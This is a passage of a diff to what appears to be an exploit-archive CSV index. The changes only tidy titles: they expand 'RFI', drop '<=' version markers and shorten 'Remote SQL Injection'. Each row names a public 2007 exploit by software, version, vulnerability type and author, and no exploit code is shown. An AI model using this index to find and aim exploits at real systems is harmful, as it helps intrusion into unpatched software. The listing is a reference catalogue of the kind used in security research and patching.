(CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0 +3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0 3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String Exploit",2007-04-17,jamikazu,windows,local,0 -3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 - (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0 -3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - (index.php) Remote File Include Exploit",2007-04-17,"Cold Zero",php,webapps,0 +3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0 +3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - (index.php) Remote File Inclusion Exploit",2007-04-17,"Cold Zero",php,webapps,0 3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - (index.php) Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final (subs.php) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 -3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 +3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 -3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) Remote SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 -3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (.WMV) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 -3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 +3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 +3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - (.WMV) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 +3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0 3772,platforms/windows/local/3772.c,"Photofiltre Studio 8.1.1 - (.TIF) Local Buffer Overflow Exploit",2007-04-21,Marsu,windows,local,0 3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 -3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - Remote SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 +3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum (forum_write.php) Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - (.XPM) Local Buffer Overflow Exploit",2007-04-22,Marsu,windows,local,0 3777,platforms/windows/local/3777.c,"XnView 1.90.3 - (.XPM) Local Buffer Overflow Exploit",2007-04-22,Marsu,windows,local,0 @@ -3437,10 +3437,10 @@ id,file,description,date,author,platform,type,port 3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - (.CLP) Buffer Overflow Exploit",2007-04-23,Marsu,windows,local,0 3780,platforms/php/webapps/3780.pl,"MyBulletinBoard (MyBB) <= 1.2.5 calendar.php Blind SQL Injection Exploit",2007-04-23,0x86,php,webapps,0 3781,platforms/php/webapps/3781.txt,"Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 -3782,platforms/windows/dos/3782.pl,"Winamp <= 5.33 - (.AVI) Remote Denial of Service Exploit",2007-04-23,DeltahackingTEAM,windows,dos,0 +3782,platforms/windows/dos/3782.pl,"Winamp 5.33 - (.AVI) Remote Denial of Service Exploit",2007-04-23,DeltahackingTEAM,windows,dos,0 3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - (navigator_ok.php asolute) Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 3784,platforms/multiple/dos/3784.c,"Opera 9.2 - (.torrent) Remote Denial of Service Exploit",2007-04-23,n00b,multiple,dos,0 -3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +3785,platforms/php/webapps/3785.txt,"Post Revolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 @@ -3458,57 +3458,57 @@ id,file,description,date,author,platform,type,port 3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 - (.ras) SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 - (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 -3803,platforms/php/webapps/3803.txt,"phpOracleView - (include_all.inc.php page_dir) RFI",2007-04-26,"Alkomandoz Hacker",php,webapps,0 +3803,platforms/php/webapps/3803.txt,"phpOracleView - (include_all.inc.php page_dir) Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3804,platforms/windows/remote/3804.txt,"Microsoft Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 - (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - (forum.php idsalon) Remote SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 +3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - (forum.php idsalon) SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit (2)",2007-04-27,shinnai,windows,remote,0 -3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 - (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0 +3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 -3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 - (.iff) Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 +3811,platforms/windows/local/3811.c,"IrfanView 4.00 - (.iff) Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - (.png) BoF Exploit",2007-04-27,Marsu,windows,local,0 -3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - Remote SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 -3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery <= 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 +3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 +3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow Exploit (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 -3816,platforms/php/webapps/3816.php,"TCExam <= 4.0.011 - (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 +3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 -3818,platforms/php/webapps/3818.htm,"The Merchant <= 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 +3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - (.ra) Remote Denial of Service Exploit",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 -3823,platforms/windows/local/3823.c,"Winamp <= 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 -3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table <= 1.43 - (inc_dir) RFI",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube <= 1.43 - (wpPATH) RFI",2007-05-01,K-159,php,webapps,0 +3823,platforms/windows/local/3823.c,"Winamp 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 +3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Exploit",2007-05-01,shinnai,windows,dos,0 -3827,platforms/php/webapps/3827.txt,"Sendcard <= 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash <= 1.00 - (wppath) RFI",2007-05-01,Crackers_Child,php,webapps,0 +3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 +3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 -3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - Remote SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 +3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service Exploit",2007-05-03,shinnai,windows,dos,0 -3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple RFI Vulnerabilities",2007-05-03,GoLd_M,php,webapps,0 -3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) RFI",2007-05-03,GoLd_M,php,webapps,0 -3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - (index.php bus) Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion Vulnerabilities",2007-05-03,GoLd_M,php,webapps,0 +3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 +3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - (index.php bus) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - (censura.php vendorid) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit",2007-05-04,shinnai,windows,remote,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Exploit",2007-05-04,shinnai,windows,dos,0 3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - (common.php locale) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) RFI",2007-05-04,kezzap66345,php,webapps,0 +3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - Remote SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 -3850,platforms/php/webapps/3850.php,"RunCMS <= 1.5.2 - (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 +3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 +3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 -3852,platforms/php/webapps/3852.txt,"PMECMS <= 1.0 - config[pathMod] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 -3853,platforms/php/webapps/3853.txt,"Persism CMS <= 0.9.2 - system[path] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 +3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 +3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3856,platforms/windows/local/3856.htm,"East Wind Software (advdaudio.ocx 1.5.1.1) Local BoF Exploit",2007-05-05,shinnai,windows,local,0 @@ -3516,16 +3516,16 @@ id,file,description,date,author,platform,type,port 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution Exploit",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Admin Bypass Vulnerabilities",2007-05-05,Dj7xpl,php,webapps,0 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 -3861,platforms/php/webapps/3861.txt,"NoAh <= 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 -3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - Remote SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 +3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 +3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 3863,platforms/php/webapps/3863.txt,"Wikivi5 - (show.php sous_rep) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 -3864,platforms/php/webapps/3864.txt,"Friendly <= 1.0d1 - (friendly_path) Remote File Inclusion Vulnerabilities",2007-05-06,GoLd_M,php,webapps,0 -3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) RFI Vulnerabilities",2007-05-07,kezzap66345,php,webapps,0 +3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion Vulnerabilities",2007-05-06,GoLd_M,php,webapps,0 +3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion Vulnerabilities",2007-05-07,kezzap66345,php,webapps,0 3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote DoS Exploit",2007-05-07,shinnai,windows,dos,0 -3867,platforms/php/webapps/3867.pl,"ACGVAnnu <= 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 -3868,platforms/php/webapps/3868.txt,"DynamicPAD <= 1.02.18 - (HomeDir) Remote File Inclusion Vulnerabilities",2007-05-07,"ThE TiGeR",php,webapps,0 +3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 +3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - (HomeDir) Remote File Inclusion Vulnerabilities",2007-05-07,"ThE TiGeR",php,webapps,0 3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 -3870,platforms/php/webapps/3870.txt,"LaVague <= 0.3 - (printbar.php views_path) RFI",2007-05-08,kezzap66345,php,webapps,0 +3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - (printbar.php views_path) Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 alert() Remote Denial of Service Exploit",2007-05-08,Dj7xpl,multiple,dos,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service Exploit",2007-05-08,shinnai,windows,dos,0 @@ -3534,23 +3534,23 @@ id,file,description,date,author,platform,type,port 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 -3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] RFI Exploit",2007-05-09,GoLd_M,php,webapps,0 +3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion Exploit",2007-05-09,GoLd_M,php,webapps,0 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3882,platforms/windows/remote/3882.html,"BarCodeWiz ActiveX Control 2.52 - (BarcodeWiz.dll) SEH Overwrite Exploit",2007-05-09,"Parveen Vashishtha",windows,remote,0 3883,platforms/windows/dos/3883.html,"BarCodeWiz ActiveX Control 2.0 - (BarcodeWiz.dll) Remote BoF PoC",2007-05-09,shinnai,windows,dos,0 -3884,platforms/php/webapps/3884.txt,"aForum <= 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 -3885,platforms/php/webapps/3885.txt,"telltarget <= 1.3.3 - (tt_docroot) Remote File Inclusion Vulnerabilities",2007-05-09,GoLd_M,php,webapps,0 -3886,platforms/php/webapps/3886.pl,"SimpleNews <= 1.0.0 FINAL (print.php news_id) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 -3887,platforms/php/webapps/3887.pl,"TutorialCMS <= 1.00 - (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 +3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 +3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion Vulnerabilities",2007-05-09,GoLd_M,php,webapps,0 +3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL (print.php news_id) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 +3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 - (.ras) Download/Execute Buffer Overflow Exploit (Win32)",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0 -3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 +3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 -3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - Remote SQL Injection",2007-05-10,warlord,php,webapps,0 -3896,platforms/php/webapps/3896.pl,"TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit",2007-05-10,Silentz,php,webapps,0 +3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 +3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 Login Bypass/SQL Injection Exploit",2007-05-10,Silentz,php,webapps,0 3897,platforms/windows/local/3897.c,"eTrust Antivirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC",2007-05-11,callAX,windows,dos,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 @@ -3560,32 +3560,32 @@ id,file,description,date,author,platform,type,port 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution Exploit",2007-05-11,Dj7xpl,php,webapps,0 3905,platforms/asp/webapps/3905.txt,"W1L3D4 Philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0 3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion Exploit",2007-05-12,Dj7xpl,php,webapps,0 -3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) Remote SQL Injection",2007-05-12,gsy,php,webapps,0 -3908,platforms/php/webapps/3908.txt,"YAAP <= 1.5 __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 +3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) SQL Injection",2007-05-12,gsy,php,webapps,0 +3908,platforms/php/webapps/3908.txt,"YAAP 1.5 __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit",2007-05-12,shinnai,windows,dos,0 -3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - (id) Remote SQL Injection",2007-05-14,CyberGhost,php,webapps,0 +3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - (id) SQL Injection",2007-05-14,CyberGhost,php,webapps,0 3912,platforms/windows/local/3912.c,"notepad++ 4.1 ruby file processing Buffer Overflow Exploit (Win32)",2007-05-12,vade79,windows,local,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 -3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) Remote SQL Injection",2007-05-13,gsy,asp,webapps,0 -3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) RFI Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 +3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0 